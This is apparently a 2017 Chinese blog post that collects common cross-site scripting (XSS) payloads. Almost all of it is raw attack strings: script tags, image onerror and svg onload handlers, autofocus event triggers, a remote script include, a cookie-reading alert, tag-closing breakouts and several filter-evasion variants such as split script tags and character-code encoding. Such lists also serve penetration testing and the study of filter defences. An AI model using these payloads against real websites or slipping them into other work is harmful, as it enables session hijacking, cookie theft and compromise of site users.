xss常用payload 发表于 2017-03-30 xss前几天整理了下xss相关的东西,所以记录下常用的payload 整理的payload1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071<img src=1><script>alert(1);</script><iframe width="100" height="100" src="http://baidu.com"></iframe><SCRIPT SRC=http://baidu.com/xss.js></SCRIPT><img src=x onerror=alert('t')> 单引号<img src="1" onerror="alert(1)"> 双引号<img src=1 onerror=alert(1);> 分号<img src=x onerror=alert(1)> <svg/onload=alert(1)><svg/onload=alert(1)>;<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg> svg<input onfocus=write(1) autofocus> <input onfocus=alert(1) autofocus><video onerror=”javascript:alert(1)”><source><img src="pic.gif" onerror="alert('1')"<img src="pic.gif" onerror="alert('1')" alt="test" title="test1" onclick="alert('2')"><img src=x.jpg onerror=alert(document.cookie)><video><source onerror="alert(1)"><body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus><img src=x onerror=alert(1)><video onerror=”javascript:alert(1)”><source><keygen autofocus onfocus=alert(1)><select autofocus onfocus=alert(1)><input onfocus=write(1) autofocus> chrome"><script src=data:,alert(1)<!-- 绕过浏览器常见闭合</script><script>alert(1)</script>'></title><script>alert(1111)</script>"><script>alert(1111)</script>一些变形</script><script>alert(String.from+CharCode(88,%2083,%2083))</script><scr<script>ipt>alert('XSS');</scr</script>ipt>iimgmg过滤了尖括号 括号可以使用 accesskey="X" onclick="confirm`1`"来自:http://blog.csdn.net/change518/article/details/51024706